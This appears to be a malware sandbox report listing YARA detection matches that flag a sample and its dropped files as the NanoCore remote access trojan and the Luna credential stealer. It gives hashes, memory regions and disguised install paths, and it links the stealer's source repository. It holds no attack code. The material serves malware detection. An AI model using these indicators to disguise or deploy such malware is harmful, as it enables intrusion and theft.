Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.32b1744.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\ProgramData\output.exe, type: DROPPED	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: C:\ProgramData\nano.exe, type: DROPPED	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\ProgramData\nano.exe, type: DROPPED	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Uses 32bit PE files

Source: 4Y85lSOUJ0.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.5720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.32b1744.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.32b1744.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
